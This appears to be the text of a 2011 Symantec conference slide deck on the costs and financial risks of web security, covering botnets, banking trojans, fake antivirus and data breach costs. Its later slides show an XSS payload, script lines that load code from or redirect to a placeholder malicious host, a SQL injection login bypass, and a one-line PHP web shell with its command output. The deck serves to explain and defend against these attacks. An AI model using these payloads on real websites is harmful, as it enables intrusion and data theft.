View
897
Download
0
Category
Preview:
DESCRIPTION
Martin Lee CISSP CEng and Dr. Les Pritchard CITP discuss the Costs and Financial Risks of Web Security at Symantec Vision 2011
Citation preview
1
Costs and Financial Risks of Web Security
Martin Lee CISSP CEng
Dr. Les Pritchard CITP
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Where the Threats Come From.
2
Insider threats
Acts of God
Malicious outsiders
(cybercriminals)
Mostly accidental data deletion.
Fire, flood, volcanos!
Malware, banking trojans.
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
How the Bad Guys Make Money
3SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Anyone’s Computer or Your Computer?
SR B03 - Costs and Financial Risks of Web Security 4
Botnets
Banking trojans
Targeted attacks
Compromising any computer.
Denial of service attacks.
Send spam.
Steal data.
Compromising any computer.
Internet bank robbery.
Compromising specific systems.
Stealing high value data.
SYMANTEC VISION 2011
Making Money From Botnets – Sending Spam
Traffic analysis of rogue website
26 days, 350 million spams, 28 sales
But, when scaled up
~$7000 in sales per day
~$2M per year
Source :
C. Kanich et al. “Spamalytics: An Empirical Analysis of Spam Marketing Conversion”. Nov 2008
(http://www.icsi.berkeley.edu/pubs/networking/2008-ccs-spamalytics.pdf)
5SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Making Money From Botnets – Denial of Service
SR B03 - Costs and Financial Risks of Web Security 6
Can hit 100Gb/sec attack traffic.
Estimated UK losses $3bn/yr.
SYMANTEC VISION 2011
Making Money From Banking Trojans
SR B03 - Costs and Financial Risks of Web Security 7
Source : http://www.wired.com/threatlevel/2010/10/zeus-ukraine-arrests/
SYMANTEC VISION 2011
Banking Trojans – Zeus Man-in-Browser Attack
8SR B03 - Costs and Financial Risks of Web Security
Malware waits for log in to internet banking,issues payments on your behalf to money mules.
SYMANTEC VISION 2011
Banking Trojans – Zeus Man-in-Browser Attack
9SR B03 - Costs and Financial Risks of Web Security
Malware intercepts data sent from bank,removes it’s transfers, adjusts balance, shows you what you expect to see.
SYMANTEC VISION 2011
Distributing Web Malware
SR B03 - Costs and Financial Risks of Web Security 10
Gumblar Lifecycle
HACKERXSS
EXPLOITMALWARE
HOST
UNAFECTED
WEBSITE
ADDS
XSS
EXPLOIT
VICTIM
CONTROLS
VISITS
FORWARDS
INSTALLS
MALWARE
STEALS
LOGIN
Uploading web malware to your websiteby stealing your login details.
SYMANTEC VISION 2011
Malware on Legitimate Domains
11
0%
20%
40%
60%
80%
100%
0 30 60 90 120 150 180Days
Malicious domains lifecycle: % remaining active over time
“Old” domains
“New” Domains
Over time more than 80% ofmalicious domainsare “Old” domains
80%
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Employee Browsing Habits
12SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Browsing Habits Outside of the Office
13SR B03 - Costs and Financial Risks of Web Security
0
20
40
60
80
100
20 40 60 80 100
Mobile
Office
% of users
% o
f w
eb
blo
cks
SYMANTEC VISION 2011
Subvert a legitimate website
WEB PAGE
Adverts
Sold by sales team
Sold by reseller
resold further
advertiser
advertiser
Malware
distributor
Distributing Web Malware – Advertising Services
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Fake AV
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Fake AV
Do the maths –
1 million products sold
@$39.95
$8.2 million fine
= $31.75 million profit!
Source: http://www.pcworld.com/businesscenter/article/217987/alleged_scareware_vendors_to_pay_82_million_to_ftc.html
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Attacking Your Website
17SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
My Website – XSS Example
18
www.example.com/index.php?page=cat&category=1&PHPSESSID=
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
My Website – XSS Example
19
www.example.com/index.php?page=cat&category=1&PHPSESSID=
becomes
www.example.com/index.php?page=cat&category=%3E%0A%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%53%74%72%69%6E%67%2E%66%72%6F%6D
Attack JS –
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
URL encode it, replace ‘category’ value
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
My Website – XSS Example
20
Attacker can execute whatever they like:
Exploit – <script src=“http://www.malicious.com/attack.js”>
Redirect – window.location.href = “http://www.malicious.com/“
Why not? – document.product.price = “0.01”
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
XSS Example – Click that link
21
Email containing link
Embed link in discussion page
WEB PAGE
ENTER TEXT SUBMIT
I agree. <img src=“/images/smiley.gif” onload=“document.location=‘http://malicious/’”>
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
SQL Injection – “Little Bobby Tables”
22SR B03 - Costs and Financial Risks of Web Security
Source: XKCD Comic - http://xkcd.com/327/
SYMANTEC VISION 2011
My Website – SQL Injection Example
23
SQL injection:
Select * from users where username = “$input” and password=md5($password);
$input = ‘ admin”; -- ‘
Select * from users where username = “admin”; -- ... ignored
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
My Website – SQL Injection Example
24
How about a file like this?
<? system($_REQUEST*‘cmd’+); ?>
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
My Website – Now completely at mercy of attacker
25
ls -l -> %6C%73%20%2D%6C
total 36-rw-rw-r-- 1 martin martin 191 Nov 27 2003 categories.phpdrwxrwxr-x 2 martin martin 4096 Mar 16 17:53 inc-rw-rw-r-- 1 martin martin 543 Mar 29 14:54 index.old-rw-r--r-- 1 martin martin 124 Mar 29 15:03 index.php-rw-rw-r-- 1 martin martin 537 Mar 29 14:41 index.php~-rw-rw-r-- 1 martin martin 2068 Mar 29 16:20 product_image.php-rw-rw-r-- 1 martin martin 1924 Nov 28 2003 product_image.php~-rw-rw-r-- 1 martin martin 189 Nov 27 2003 products.php-rw-r--r-- 1 martin martin 31 Mar 29 15:04 shell.php
http://www.example.com/images/shell.php?cmd=%6C%73%20%2D%6C
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Vulnerable Websites
26
Skilled attackers can easily find vulnerabilities.
Others can use a list of vulnerable websites.
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
How You Lose Money
27SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Data Breach Losses
• Ponemon Institute & Symantec Research
– Average cost per data breach $7.2 million.
– $214 per breached record.
– 31% of breaches are malicious or criminal attack.
– Malicious attacks cost more $318 per breached record.
28
See: http://www.symantec.com/about/news/release/article.jsp?prid=20110308_01
Calculate your risk: http://databreachcalculator.com/
SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
0%
10%
20%
30%
40%
50%
60%
Environment downtime
Corporate data theft
Customer or employee PI theft
Customer financial information theft
Intellectual property theft
Symantec SMB Survey – What do SMBs suffer?
29SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Protecting Yourself.
30SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Know Your Assets, Know Attack Vectors
31SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Layers of Protection Provide Maximum Detection
32SR B03 - Costs and Financial Risks of Web Security
SYMANTEC VISION 2011
Test & Monitor Your Web Services
33SR B03 - Costs and Financial Risks of Web Security
Find & fix vulnerabilities in
your web services.
Monitor logs to identify attacks,
block attacker.
You don’t need to be perfect,
just better than your
competitors.
Thank you!
Copyright © 2011 Symantec Corporation. All rights reserved. Symantec and the Symantec Logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.
This document is provided for informational purposes only and is not intended as advertising. All warranties relating to the information in this document, either express or implied, are disclaimed to the maximum extent allowed by law. The information in this document is subject to change without notice.
34
Martin Lee
Martin_lee@symantec.com
+44 1452 627 042
SR B03 - Costs and Financial Risks of Web Security
Recommended